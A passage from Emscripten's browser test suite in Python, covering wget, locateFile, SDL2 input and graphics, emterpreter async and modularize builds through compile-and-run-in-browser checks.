self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY=1'])
print('asyncify+emterpreter')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'ASYNCIFY=1', '-s', 'EMTERPRETIFY=1'])
print('emterpreter by itself')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'])
def test_wget_data(self):
with open(os.path.join(self.get_dir(), 'test.txt'), 'w') as f:
f.write('emscripten')
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O2', '-g2'])
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O2', '-g2', '-s', 'ASSERTIONS=1'])
def test_locate_file(self):
for wasm in [0, 1]:
print('wasm', wasm)
self.clear()
open('src.cpp', 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
'''))
open('data.txt', 'w').write('load me right before...')
open('pre.js', 'w').write('Module.locateFile = function(x) { return "sub/" + x };')
Popen([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w')).communicate()
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
Popen([PYTHON, EMCC, 'src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)]).communicate()
os.mkdir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
open('shell.html', 'w').write('''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
Popen([PYTHON, EMCC, 'src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)] + args).communicate()
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
open('src.cpp', 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
'''))
in_html('200')
@requires_graphics_hardware
def test_glfw3(self):
for opts in [[], ['-Os', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
def test_asm_swapping(self):
self.clear()
open('run.js', 'w').write(r'''
Module['onRuntimeInitialized'] = function() {
// test proper initial result
var result = Module._func();
console.log('first: ' + result);
if (result !== 10) throw 'bad first result';
// load second module to be swapped in
var second = document.createElement('script');
second.onload = function() { console.log('loaded second') };
second.src = 'second.js';
document.body.appendChild(second);
console.log('second appended');
Module['onAsmSwap'] = function() {
console.log('swapped');
// verify swapped-in result
var result = Module._func();
console.log('second: ' + result);
if (result !== 22) throw 'bad second result';
Module._report(999);
console.log('reported');
};
};
''')
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2']]:
print(opts)
opts += ['-s', 'WASM=0', '--pre-js', 'run.js', '-s', 'SWAPPABLE_ASM_MODULE=1'] # important that both modules are built with the same opts
open('second.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'asm_swap2.cpp')).read()))
Popen([PYTHON, EMCC, 'second.cpp'] + opts).communicate()
Popen([PYTHON, path_from_root('tools', 'distill_asm.py'), 'a.out.js', 'second.js', 'swap-in']).communicate()
assert os.path.exists('second.js')
if isinstance(SPIDERMONKEY_ENGINE, list) and len(SPIDERMONKEY_ENGINE[0]) != 0:
out = run_js('second.js', engine=SPIDERMONKEY_ENGINE, stderr=PIPE, full_output=True, assert_returncode=None)
self.validate_asmjs(out)
else:
print('Skipping asm validation check, spidermonkey is not configured')
self.btest(path_from_root('tests', 'asm_swap.cpp'), args=opts, expected='999')
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpg'))
open(os.path.join(self.get_dir(), 'sdl2_image.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.jpeg'))
open(os.path.join(self.get_dir(), 'sdl2_image_jpeg.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
Popen([
PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_image_jpeg.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
]).communicate()
self.run_browser('page.html', '', '/report_result?600')
def test_sdl2_image_formats(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
def test_sdl2_key(self):
for defines in [[]]:
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, c);
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keyup", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl2_key.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_key.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_key.c'), '-o', 'page.html'] + defines + ['-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''']).communicate()
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(charCode) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keypress", true, true, window,
0, 0, 0, 0, 0, charCode);
document.body.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl2_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_text.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl2_mouse(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'sdl2_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?1', timeout=30)
def test_sdl2_mouse_offsets(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
open(os.path.join(self.get_dir(), 'sdl2_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2']).communicate()
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-s', 'LEGACY_GL_EMULATION=1'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True) # XXX closure fails on proxy
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
def zzztest_sdl2_gfx_primitives(self):
self.btest('sdl2_gfx_primitives.c', args=['-s', 'USE_SDL=2', '-lSDL2_gfx'], reference='sdl_gfx_primitives.png', reference_slack=1)
def test_sdl2_canvas_palette_2(self):
open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
Module['arguments'] = ['-r'];
''')
open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
Module['arguments'] = ['-g'];
''')
open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2'])
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'])
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'])
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
open('test.html', 'w').write(html)
open('data.txt', 'w').write('datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING=1'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
open(os.path.join(self.get_dir(), 'sdl2_gl_read.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_gl_read.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2']).communicate()
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
open('test.html', 'w').write(html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window',
timeout=30)
def test_sdl2_custom_cursor(self):
shutil.copyfile(path_from_root('tests', 'cursor.bmp'), os.path.join(self.get_dir(), 'cursor.bmp'))
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest('sdl2_misc.c', expected='1', args=['-s', 'USE_SDL=2'])
print('also test building to object files first')
src = open(path_from_root('tests', 'sdl2_misc.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
Popen([PYTHON, EMCC, 'test.c', '-s', 'USE_SDL=2', '-o', 'test.o']).communicate()
Popen([PYTHON, EMCC, 'test.o', '-s', 'USE_SDL=2', '-o', 'test.html']).communicate()
self.run_browser('test.html', '...', '/report_result?1')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'Cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '--std=c++11', '--preload-file', preload_file, '--use-preload-plugins'],
message='You should see Cocos2d logo',
timeout=30)
def test_emterpreter_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-g2'])
def test_emterpreter_async_2(self):
self.btest('emterpreter_async_2.cpp', '40', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O3'])
def test_emterpreter_async_virtual(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_virtual.cpp', '5', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-profiling'])
def test_emterpreter_async_virtual_2(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_virtual_2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1', '-profiling'])
def test_emterpreter_async_bad(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_bad.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=1'])
def test_emterpreter_async_bad_2(self):
for opts in [0, 1, 2, 3]:
for assertions in [0, 1]:
# without assertions, we end up continuing to run more non-emterpreted code in this testcase, returning 1
# with assertions, we hit the emterpreter-async assertion on that, and report a clear error
expected = '2' if assertions else '1'
print(opts, assertions, expected)
self.btest('emterpreter_async_bad_2.cpp', expected, args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=%s' % assertions])
def test_emterpreter_async_mainloop(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_mainloop.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts)], timeout=20)
def test_emterpreter_async_with_manual(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_with_manual.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_acall"]'], timeout=20)
def test_emterpreter_async_sleep2(self):
self.btest('emterpreter_async_sleep2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz'])
def test_emterpreter_async_sleep2_safeheap(self):
# check that safe-heap machinery does not cause errors in async operations
self.btest('emterpreter_async_sleep2_safeheap.cpp', '17', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz', '-profiling', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'EMTERPRETIFY_WHITELIST=["_main","_callback","_fix"]', '-s', 'NO_EXIT_RUNTIME=0'])
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Os', '-s', 'ASSERTIONS=1', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP=1', '-lSDL'], timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Os'], timeout=30)
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'], timeout=30)
def test_emterpreter_async_iostream(self):
self.btest('emterpreter_async_iostream.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'])
def test_modularize(self):
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
for args, code in [
([], 'Module();'), # defaults
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // errorneous module capture will load this and cause timeout
HelloWorld();
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var hello = HelloWorld({ noInitialRun: true, onRuntimeInitialized: function() {
setTimeout(function() { hello._main(); }); // must be async, because onRuntimeInitialized may be called synchronously, so |hello| is not yet set!
} });
'''),
# similar, but without a mem init file, everything is sync and simple
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
var hello = HelloWorld({ noInitialRun: true});
hello._main();
'''),
# use the then() API
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(function(hello) {
hello._main();
});
'''),
# then() API, also note the returned value
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var helloOutside = HelloWorld({ noInitialRun: true }).then(function(hello) {
setTimeout(function() {
hello._main();
if (hello !== helloOutside) throw 'helloOutside has not been set!'; // as we are async, helloOutside must have been set
});
});
'''),
]:
print('test on', opts, args, code)
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
# this test is synchronous, so avoid async startup due to wasm features
Popen([PYTHON, EMCC, 'test.c', '-s', 'MODULARIZE=1', '-s', 'BINARYEN_ASYNC_COMPILATION=0', '-s', 'SINGLE_FILE=1'] + args + opts).communicate()
open('a.html', 'w').write('''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
# amount of memory different from the default one that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
# the main function simply checks that the amount of allocated heap memory is correct
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['TOTAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory
open('test.c', 'w').write(self.with_report_result(src))
# generate a dummy file
open('dummy_file', 'w').write('dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
Popen([PYTHON, EMCC, 'test.c', '-s', 'WASM=0', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts).communicate()
open('a.html', 'w').write('''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom TOTAL_MEMORY value
var foo = Foo({ TOTAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
Popen([PYTHON, path_from_root('tools', 'webidl_binder.py'),
path_from_root('tests', 'webidl', 'test.idl'),
'glue']).communicate()[0]
assert os.path.exists('glue.cpp')
assert os.path.exists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I' + path_from_root('tests', 'webidl'), '-DBROWSER'] + opts)
def test_dynamic_link(self):
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.wasm'];
''')
